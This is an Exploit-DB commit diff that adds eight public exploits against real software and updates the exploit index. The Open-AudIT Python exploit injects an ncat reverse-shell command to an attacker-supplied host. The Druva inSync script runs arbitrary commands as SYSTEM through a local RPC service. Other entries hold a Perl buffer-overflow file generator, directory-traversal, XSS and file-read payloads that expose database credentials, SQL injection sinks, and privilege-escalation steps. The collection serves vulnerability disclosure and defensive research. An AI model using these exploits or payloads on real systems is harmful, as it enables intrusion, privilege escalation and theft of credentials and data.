DB: 2020-04-30

8 changes to exploits/shellcodes

Andrea ST Filters Service  1.0.64.7  - 'Andrea ST Filters Service ' Unquoted Service Path
Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)
EmEditor 19.8 - Insecure File Permissions
Druva inSync Windows Client 6.5.2 - Local Privilege Escalation
Open-AudIT Professional 3.3.1 - Remote Code Execution
School ERP Pro 1.0 - Arbitrary File Read
Easy Transfer 1.7 for iOS - Directory Traversal
hits script 1.0 - 'item_name' SQL Injection

exploits/ios/webapps/48395.txt

@@ -0,0 +1,187 @@
+# Title: Easy Transfer 1.7 for iOS - Directory Traversal
+# Author: Vulnerability Laboratory
+# Date: 2020-04-27
+# Software: https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078
+# CVE: N/A
+
+Document Title:
+===============
+Easy Transfer v1.7 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2223
+
+
+Common Vulnerability Scoring System:
+====================================
+7.1
+
+
+Affected Product(s):
+====================
+Rubikon Teknoloji
+Product: Easy Transfer v1.7 - iOS Mobile Web-Application
+(Copy of the Homepage:
+https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078 )
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-27: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+1.1
+A directory traversal web vulnerability has been discovered in the Easy
+Transfer Wifi Transfer v1.7 ios mobile application.
+The vulnerability allows remote attackers to change the application path
+in performed requests to compromise the local application
+or file-system of a mobile device. Attackers are for example able to
+request environment variables or a sensitive system path.
+
+The directory-traversal web vulnerability is located in the main
+application path request performed via GET method. Attackers are
+able to request for example the local path variables of the web-server
+by changing the local path in the performed request itself.
+In a first request the attack changes the path, the host redirects to
+complete the adress with "..". Then the attacker just
+attaches /.. a final slash to its request and the path can be accessed
+via web-browser to download or list local files.
+
+Exploitation of the directory traversal web vulnerability requires no
+privileged web-application user account or user interaction.
+Successful exploitation of the vulnerability results in information
+leaking by unauthorized file access and mobile application compromise.
+
+
+1.2
+Multiple persistent cross site scripting vulnerability has been
+discovered in the Easy Transfer Wifi Transfer v1.7 ios mobile application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise the mobile
+web-application from the application-side.
+
+The persistent vulnerabilities are located in the `Create Folder` and
+`Move/Edit` functions. Attackers are able to inject own malicious
+script codes to the `oldPath`, `newPath` and `path` parameters. The
+request method to inject is POST and the attack vector is located on
+the application-side.
+
+Successful exploitation of the vulnerability results in session
+hijacking, persistent phishing attacks, persistent external redirects
+to malicious source and persistent manipulation of affected application
+modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Create Folder
+[+] Move/Edit
+
+Vulnerable Parameter(s):
+[+] oldPath
+[+] newPath
+[+] path
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The directory traversal web vulnerability can be exploited by remote
+attackers with wifi network access without user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+PoC: Exploitation
+http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
+..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../
+
+[{"path":"/../../../../../../../../../../../../../../../../../../../../../../../../../../../test/","name":"test"}]
+
+
+--- PoC Session Logs [GET] --- (list)
+http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
+..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../
+Host: localhost
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+-
+GET: HTTP/1.1 200 OK
+Content-Length: 213
+Content-Type: application/json
+Connection: Close
+
+
+1.2
+The persistent input validation web vulnerabilities can be exploited by
+remote attackers with wifi network access with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+PoC: Exploitation
+<scriptx00>alert(document.domain)</script>
+
+
+--- PoC Session Logs [POST] --- (Create & Move)
+http://localhost/create
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 47
+Origin: http://localhost
+Connection: keep-alive
+Referer: http://localhost/
+path=/test<scriptx00>alert(document.domain)</script>
+-
+POST: HTTP/1.1 200 OK
+Cache-Control: no-cache
+Content-Length: 2
+Content-Type: application/json
+Connection: Close
+-
+http://localhost/move
+Host: localhost
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 69
+Origin: http://localhost
+Connection: keep-alive
+Referer: http://localhost/
+oldPath=/test/<scriptx00>alert(document.domain)</script>&newPath=/test<scriptx00>alert(document.domain)</script>
+-
+POST: HTTP/1.1 200 OK
+Content-Length: 411
+Content-Type: text/html; charset=utf-8
+Connection: Close
+- [GET] (Execution)
+http://localhost/evil.source
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Referer: http://localhost/
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM

exploits/php/webapps/48393.py

@@ -0,0 +1,131 @@
+# Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution
+# Date: 2020-04-22
+# Exploit Author: Askar
+# CVE: CVE-2020-8813
+# Vendor Homepage: https://opmantek.com/
+# Version: v3.3.1
+# Tested on: Ubuntu 18.04 / PHP 7.2.24
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import warnings
+import random
+import string
+from bs4 import BeautifulSoup
+from urllib.parse import quote
+
+warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')
+
+
+if len(sys.argv) !=3D 6:
+    print("[~] Usage : ./openaudit-exploit.py url username password ip port=
+")
+    exit()
+
+url =3D sys.argv[1]
+username =3D sys.argv[2]
+password =3D sys.argv[3]
+ip =3D sys.argv[4]
+port =3D sys.argv[5]
+
+request =3D requests.session()
+
+def inject_payload():
+    configuration_path =3D url+"/en/omk/open-audit/configuration/90"
+    data =3D 'data=3D{"data":{"id":"90","type":"configuration","attributes"=
+:{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, =
+port)
+    request.patch(configuration_path, data)
+    print("[+] Payload injected in settings")
+
+
+def start_discovery():
+    discovery_path =3D url+"/en/omk/open-audit/discoveries/create"
+    post_discovery_path =3D url+"/en/omk/open-audit/discoveries"
+    scan_name =3D "".join([random.choice(string.ascii_uppercase) for i in r=
+ange(10)])
+    req =3D request.get(discovery_path)
+
+    response =3D req.text
+    soup =3D BeautifulSoup(response, "html5lib")
+    token =3D soup.findAll('input')[5].get("value")
+    buttons =3D soup.findAll("button")
+    headers =3D {"Referer" : discovery_path}
+    request_data =3D {
+    "data[attributes][name]":scan_name,
+    "data[attributes][other][subnet]":"10.10.10.1/24",
+    "data[attributes][other][ad_server]":"",
+    "data[attributes][other][ad_domain]":"",
+    "submit":"",
+    "data[type]":"discoveries",
+    "data[access_token]":token,
+    "data[attributes][complete]":"y",
+    "data[attributes][org_id]":"1",
+    "data[attributes][type]":"subnet",
+    "data[attributes][devices_assigned_to_org]":"",
+    "data[attributes][devices_assigned_to_location]":"",
+    "data[attributes][other][nmap][discovery_scan_option_id]":"1",
+    "data[attributes][other][nmap][ping]":"y",
+    "data[attributes][other][nmap][service_version]":"n",
+    "data[attributes][other][nmap][open|filtered]":"n",
+    "data[attributes][other][nmap][filtered]":"n",
+    "data[attributes][other][nmap][timing]":"4",
+    "data[attributes][other][nmap][nmap_tcp_ports]":"0",
+    "data[attributes][other][nmap][nmap_udp_ports]":"0",
+    "data[attributes][other][nmap][tcp_ports]":"22,135,62078",
+    "data[attributes][other][nmap][udp_ports]":"161",
+    "data[attributes][other][nmap][timeout]":"",
+    "data[attributes][other][nmap][exclude_tcp_ports]":"",
+    "data[attributes][other][nmap][exclude_udp_ports]":"",
+    "data[attributes][other][nmap][exclude_ip]":"",
+    "data[attributes][other][nmap][ssh_ports]":"22",
+    "data[attributes][other][match][match_dbus]":"",
+    "data[attributes][other][match][match_fqdn]":"",
+    "data[attributes][other][match][match_dns_fqdn]":"",
+    "data[attributes][other][match][match_dns_hostname]":"",
+    "data[attributes][other][match][match_hostname]":"",
+    "data[attributes][other][match][match_hostname_dbus]":"",
+    "data[attributes][other][match][match_hostname_serial]":"",
+    "data[attributes][other][match][match_hostname_uuid]":"",
+    "data[attributes][other][match][match_ip]":"",
+    "data[attributes][other][match][match_ip_no_data]":"",
+    "data[attributes][other][match][match_mac]":"",
+    "data[attributes][other][match][match_mac_vmware]":"",
+    "data[attributes][other][match][match_serial]":"",
+    "data[attributes][other][match][match_serial_type]":"",
+    "data[attributes][other][match][match_sysname]":"",
+    "data[attributes][other][match][match_sysname_serial]":"",
+    "data[attributes][other][match][match_uuid]":""
+
+    }
+    print("[+] Creating discovery ..")
+    req =3D request.post(post_discovery_path, data=3Drequest_data, headers=
+=3Dheaders, allow_redirects=3DFalse)
+    disocvery_url =3D url + req.headers['Location'] + "/execute"
+    print("[+] Triggering payload ..")
+    print("[+] Check your nc ;)")
+    request.get(disocvery_url)
+
+
+def login():
+    login_info =3D {
+    "redirect_url": "/en/omk/open-audit",
+    "username": username,
+    "password": password
+    }
+    login_request =3D request.post(url+"/en/omk/open-audit/login", login_in=
+fo)
+    login_text =3D login_request.text
+    if "There was an error authenticating" in login_text:
+        return False
+    else:
+        return True
+
+if login():
+    print("[+] LoggedIn Successfully")
+    inject_payload()
+    start_discovery()
+else:
+    print("[-] Cannot login!")

exploits/php/webapps/48394.txt

@@ -0,0 +1,42 @@
+# Exploit Title: School ERP Pro 1.0 - Arbitrary File Read
+# Date: 2020-04-28
+# Author: Besim ALTINOK
+# Vendor Homepage: http://arox.in
+# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
+# Version: latest version
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+# CVE: N/A
+
+Vulnerable code: (/student_staff/download.php)
+- File Name: download.php
+- Content of the download.php
+
+<?php
+if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") {
+$file = $_REQUEST['document'];
+header("Content-type: application/force-download");
+header("Content-Transfer-Encoding: Binary");
+header("Content-length: ".filesize($file));
+header("Content-disposition: attachment; filename=\"".$file."\"");
+readfile($file);
+exit;
+}
+?>
+
+------------
+*Payload:*
+---------------
+
+http://localhost/school_erp/student_staff/download.php?document=../includes/constants.inc.php
+------------------------
+*After run payload: (we accessed of the file content)*
+------------------------
+
+<?php
+
+  define('DB_SERVER', 'localhost');
+  define('DB_SERVER_USERNAME', 'aroxi********');
+  define('DB_SERVER_PASSWORD', 'erp**********');
+  define('DB_DATABASE', 'aroxi****************');
+?>

exploits/php/webapps/48399.txt

@@ -0,0 +1,100 @@
+# Exploit Title: hits script 1.0 - 'item_name' SQL Injection
+# Date: 2020-04-27
+# Exploit Author: SajjadBnd
+# Vendor Homepage: https://hits.ir
+# Software Link: http://dl.persianscript.ir/script/hitsir-script-persian%28PersianScript.ir%29.zip
+# Software Link(mirror): http://dl.nuller.ir/hitsir-script-persian[www.nuller.ir].zip
+# Version: 1.0
+# Tested on: Win10 Professional x64
+
+[ description of script ]
+
+With this script you can set up a site to exchange statistics and traffic as well as
+increase rankings. In this script, it is possible to exchange Google +1,
+exchange Facebook points, exchange Twitter followers,
+exchange YouTube visitors, exchange visit statistics.
+
+[ poc ]
+
+file : ipn.php
+
+parameters : 'item_name' , 'item_number'
+method : POST
+source [
+
+36: mysql_query $pack = mysql_fetch_object(mysql_query("SELECT * FROM `c_pack` WHERE `name`='{$item_name}' AND `coins`='{$item_number}'"));
+19: $item_name = $_POST['item_name'];
+20: $item_number = $_POST['item_number'];
+
+requires:
+4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename")))
+31: if(!$fp) else
+35: if(strcmp($res, "VERIFIED") == 0)
+
+]
+
+parameter : 'custom'
+method : POST
+source [
+
+43: mysql_query mysql_query("UPDATE `users` SET `coins`=`coins`+'{$pack->coins}' WHERE `id`='{$custom}'");
+27: $custom = $_POST['custom'];
+
+requires:
+4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename")))
+31: if(!$fp) else
+35: if(strcmp($res, "VERIFIED") == 0)
+41: if(($receiver_email == $site->paypal) && ($payment_amount == $pack->price) && ($payment_status == 'Completed'))
+
+]
+
+parameters : 'item_name','mc_gross'
+method : POST
+source [
+
+44: mysql_query mysql_query("INSERT INTO `transactions` (user, points, pack, money, date) VALUES('{$user->login}', '{$pack->coins}', '{$item_name}', '{$payment_amount}', NOW())");
+19: $item_name = $_POST['item_name'];
+22: $payment_amount = $_POST['mc_gross'];
+
+requires:
+4: if(!(mysql_connect("$host", "$user", "$pass") && mysql_select_db("$tablename")))
+31: if(!$fp) else
+35: if(strcmp($res, "VERIFIED") == 0)
+41: if(($receiver_email == $site->paypal) && ($payment_amount == $pack->price) && ($payment_status == 'Completed'))
+
+]
+
+
+file : register.php
+
+parameters : 'PlusREF','register'
+method : COOKIE,POST
+source [
+
+22: mysql_query $user1 = mysql_query("SELECT * FROM `users` WHERE `id`='{$ref}'");
+21: $ref = $_COOKIE['PlusREF'];
+
+requires:
+3: if(isset($_POST['register']))
+19: if(!checkpwd ($sec['password'], $sec['password2'])) else
+20: if(isset($_COOKIE['PlusREF']))
+
+]
+
+&
+
+source [
+
+40: mysql_query mysql_query("INSERT INTO `users`(email,login,IP,pass,passdecoded,ref,signup,activate) values('{$sec['email']}','{$sec['user']}','$final','$passc','$passa','{$ref}',NOW(),'{$activare}')") or
+37: $final = visitorip ();
+39: $passc = md5($passa);
+38: $passa = $sec['password'];
+38: $passa = $sec['password'];
+21: $ref = $_COOKIE['PlusREF']; // if(isset($_COOKIE)),
+26: $activare = rand(000000000, 999999909);
+
+requires:
+3: if(isset($_POST['register']))
+19: if(!checkpwd ($sec['password'], $sec['password2'])) else
+
+]

exploits/windows/local/48396.txt

@@ -0,0 +1,34 @@
+# Exploit Title: Andrea ST Filters Service  1.0.64.7  - 'Andrea ST Filters Service ' Unquoted Service Path
+# Discovery by: Roberto Piña
+# Discovery Date: 2020-04-28
+# Vendor Homepage: https://andreaelectronics.com/
+# Software Link : https://andreaelectronics.com/
+# Tested Version: 1.0.64.7
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Andrea" | findstr /i /v """
+Andrea ST Filters Service                                                        AESTFilters                               C:\Program Files\IDT\WDM\AESTSr64.exe                                                                                                         Auto
+
+C:\>sc qc AESTFilters
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: AESTFilters
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Andrea ST Filters Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path 
+# undetected by the OS or other security applications where it could potentially be executed during 
+# application startup or reboot. If successful, the local user's code would execute with the elevated 
+# privileges of the application.

exploits/windows/local/48397.txt

@@ -0,0 +1,193 @@
+# Title: Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)
+# Author: Vulnerability Laboratory
+# Date: 2020-04-28
+# Vendor: https://www.internetdownloadmanager.com
+# Software: https://www.internetdownloadmanager.com/download.html
+# CVE: N/A
+
+Document Title:
+===============
+Internet Download Manager v6.37.11.1 - Stack Buffer Overflow Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2236
+
+
+Common Vulnerability Scoring System:
+====================================
+7.1
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-28: Public Disclosure (Vulnerability Laboratory)
+(Copy of the Homepage:
+https://www.internetdownloadmanager.com/support/about_us.html )
+(Sofwtare Product: https://www.internetdownloadmanager.com/download.html)
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+Multiple stack buffer overflow vulnerabilities has been discovered in
+the official Internet Download Manager v6.37.11.1 software.
+The bufer overflow allows to overwrite registers of the process to
+compromise the file-system by elevates local process privileges.
+
+1.1
+The first stack buffer overflow is located in the `search` function of
+the downloads menu. The search function itself does not use
+any secure restriction in the requested search variable of the inputs.
+Local attackers with access to the software are able to overflow
+the registers to elevate local process privileges. Thus allows a local
+attacker to compromise the local computer- or file-system.
+
+1.2
+The second stack buffer overflow is located in the `Export/Import`
+function of the tasks menu. Local users are able to import and
+export the download tasks as *.ef2 file. Local attackers are able to
+import manipulated *.ef2 files with manipulated referer and
+source url to overwrite the eip register. The issue occurs because of
+the insufficient ef2 filetype (context) validation process
+that does not perform any length restrictions.
+
+The security risk of the local stack buffer overflow vulnerabilities in
+the software are estimated as high with a cvss count of 7.1.
+Exploitation of the buffer overflow vulnerability requires a low
+privilege or restricted system user account without user interaction.
+Successful exploitation of the vulnerability results in overwrite of the
+active registers to compromise of the computer system or process.
+
+Vulnerable Module(s):
+[+] Search
+[+] Import/Export (ef2)
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The stack buffer overflow vulnerability can be exploited by local
+attackers with system user privileges without user interaction.
+For security demonstration or to reproduce the local vulnerability
+follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the software
+2. Click the downloads menu and open the search
+3. Inject a large unicode payload inside the search input field and transmit
+4. The software crashs with several uncaught exception because of
+overwritten register (0168D8F0)
+5. Successful reproduce of the local buffer overflow vulnerability!
+
+
+--- Debug Logs (0168D8F0) ---
+00d61850 668b08          mov     cx,word ptr [eax]        ds:002b:41414141
+-
+00D6186D  |. 56             PUSH ESI                                 ; /Arg1
+-
+00D61882  |. E8 59FFFFFF    CALL IDMan.00D617E0                      ;
+IDMan.00D617E0
+-
+00D6189B  |> 50             PUSH EAX                                 ; /Arg1
+-
+00D6189E  |. E8 3DFFFFFF    CALL IDMan.00D617E0                      ;
+IDMan.00D617E0
+-
+Call stack
+ Address=0168C79C
+ Stack=00DFE0F2
+ Procedure / arguments=IDMan.00D617E0
+ Called from=IDMan.00DFE0ED
+ Frame=0168E02C
+-
+SEH chain
+Address    SE handler
+0168C790   IDMan.00F751E8
+0168D8F0   41414141
+-
+EAX 41414141
+ECX 01680000
+EDX 41414141
+EBX 00000001
+ESP 0168C76C
+EBP 0168E02C UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
+ESI 0168C7AC UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
+EDI 00410043
+EIP 00D61850 IDMan.00D61850
+Executable modules
+ Base=00D60000
+ Size=00539000 (5476352.)
+ Entry=00F5CB1C IDMan.<ModuleEntryPoint>
+ Name=IDMan
+ File version=6, 37, 11, 2
+ Path=C:Program Files (x86)Internet Download ManagerIDMan.exe
+
+
+1.2
+The stack buffer overflow vulnerability can be exploited by local
+attackers with system user privileges without user interaction.
+For security demonstration or to reproduce the local vulnerability
+follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the software
+2. Start the bof_poc.pl
+3. Open the tasks menu
+4. Click import and import *.ef2 poc
+Note: The software process crashs on import with uncaught exception
+5. Successful reproduce of the local buffer overflow vulnerability!
+
+
+Usage Example: Export/Import (*.ef2)
+<
+https://www.vulnerability-lab.com/download_content.php?id=1337
+referer: https://www.vulnerability-lab.com/
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
+>
+
+
+PoC: Exploit
+#!/usr/bin/perl
+# Local Stack Buffer Overflow Exploit for Internet Download Manager
+v6.37.11.1
+# Vulnerability Laboratory - Benjamin Kunz Mejri
+my $poc = "bof_poc.ef2" ;
+print "[+] Producing bof_poc.ef2 ..." ;
+my $buff0=" "."<" x 1;
+my $buff1=" n https://"."A" x 1024;
+my $buff2=" n Referer:"."A" x 1024;
+my $buff3=" n User Agent:"."A" x 1024;
+my $buff4=" n ".">" x 1;
+open(ef2, ">>$poc") or die "Cannot open $poc";
+print ef2 $buff0;
+print ef2 $buff1;
+print ef2 $buff2;
+print ef2 $buff3;
+print ef2 $buff4;
+close(ef2);
+print "n[+] done !";
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM

exploits/windows/local/48398.txt

@@ -0,0 +1,67 @@
+# Exploit Title: EmEditor 19.8 - Insecure File Permissions
+# Date: 2020-04-27
+# Exploit Author: SajjadBnd
+# Vendor Homepage: https://www.emeditor.com/
+# Software Link: https://support.emeditor.com/en/downloads/suggested
+# Version: 19.8
+# Tested on: Win10 Professional x64
+
+[ Description ]
+
+EmEditor is a fast, lightweight, yet extensible, easy-to-use text editor for Windows.
+Both native 64-bit and 32-bit builds are available, and moreover,
+the 64-bit includes separate builds for SSE2 (128-bit), AVX-2 (256-bit),
+and AVX-512 (512-bit) instruction sets.
+
+[ PoC ]
+
+C:\Users\user\AppData\Local\Programs\EmEditor
+λ icacls *.exe
+
+ee128.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+ee256.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+ee512.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+EEAdmin.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+eehlpver.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+eeupdate.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+emedhtml.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+EmEditor.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+emedtray.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+emedws.exe NT AUTHORITY\SYSTEM:(F)
+BUILTIN\Administrators:(F)
+DESKTOP-K4UDI4I\user:(F)
+
+Successfully processed 10 files; Failed processing 0 files
+
+[ Exploit - Privilege Escalation ]
+
+Replace any *.exe files with any executable
+malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)
+- Also you can use DLL Hijacking technique(emonig.dll,emregexp.dll,emtoast.dll..) ;D

exploits/windows/local/48400.txt

@@ -0,0 +1,54 @@
+# Exploit Title: Druva inSync Windows Client 6.5.2 - Local Privilege Escalation
+# Date: 2020-04-28
+# Exploit Author: Chris Lyne
+# Vendor Homepage: druva.com
+# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.5.2/inSync6.5.2r99097.msi
+# Version: 6.5.2
+# Tested on: Windows 10
+# CVE : CVE-2019-3999
+# See also: https://www.tenable.com/security/research/tra-2020-12
+
+import socket
+import struct
+import sys
+
+# Command injection in inSyncCPHwnet64 RPC service
+# Runs as nt authority\system. so we have a local privilege escalation
+
+if len(sys.argv) < 2:
+    print "Usage: " + __file__ + " <quoted command to execute>"
+    print "E.g. " + __file__ + " \"net user /add tenable\""
+    sys.exit(0)
+
+ip = '127.0.0.1'
+port = 6064
+command_line = sys.argv[1]
+
+# command gets passed to CreateProcessW
+def make_wide(str):
+    new_str = ''
+    for c in str:
+        new_str += c
+        new_str += '\x00'
+    return new_str
+
+hello = "inSync PHC RPCW[v0002]"
+func_num = "\x05\x00\x00\x00"      # 05 is to run a command
+command_line = make_wide(command_line)
+command_length = struct.pack('<i', len(command_line))
+
+# send each request separately
+requests = [ hello, func_num, command_length, command_line ]
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((ip, port))
+
+i = 1
+for req in requests:
+    print 'Sending request' + str(i)
+    sock.send(req)
+    i += 1
+
+sock.close()
+
+print "Done."

files_exploits.csv

@@ -11042,6 +11042,10 @@ id,file,description,date,author,type,platform,port
 48387,exploits/macos/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,macos,
 48388,exploits/windows/local/48388.rb,"Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)",2020-04-28,Metasploit,local,windows,
 48391,exploits/windows/local/48391.txt,"NVIDIA Update Service Daemon 1.0.21  - 'nvUpdatusService' Unquoted Service Path",2020-04-28,"Roberto Piña",local,windows,
+48396,exploits/windows/local/48396.txt,"Andrea ST Filters Service  1.0.64.7  - 'Andrea ST Filters Service ' Unquoted Service Path",2020-04-29,"Roberto Piña",local,windows,
+48397,exploits/windows/local/48397.txt,"Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)",2020-04-29,Vulnerability-Lab,local,windows,
+48398,exploits/windows/local/48398.txt,"EmEditor 19.8 - Insecure File Permissions",2020-04-29,SajjadBnd,local,windows,
+48400,exploits/windows/local/48400.txt,"Druva inSync Windows Client 6.5.2 - Local Privilege Escalation",2020-04-29,"Chris Lyne",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42627,3 +42631,7 @@ id,file,description,date,author,type,platform,port
 48386,exploits/php/webapps/48386.txt,"Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)",2020-04-27,Besim,webapps,php,
 48390,exploits/php/webapps/48390.txt,"School ERP Pro 1.0 - 'es_messagesid' SQL Injection",2020-04-28,Besim,webapps,php,
 48392,exploits/php/webapps/48392.txt,"School ERP Pro 1.0 - Remote Code Execution",2020-04-28,Besim,webapps,php,
+48393,exploits/php/webapps/48393.py,"Open-AudIT Professional 3.3.1 - Remote Code Execution",2020-04-29,Askar,webapps,php,
+48394,exploits/php/webapps/48394.txt,"School ERP Pro 1.0 - Arbitrary File Read",2020-04-29,Besim,webapps,php,
+48395,exploits/ios/webapps/48395.txt,"Easy Transfer 1.7 for iOS - Directory Traversal",2020-04-29,Vulnerability-Lab,webapps,ios,
+48399,exploits/php/webapps/48399.txt,"hits script 1.0 - 'item_name' SQL Injection",2020-04-29,SajjadBnd,webapps,php,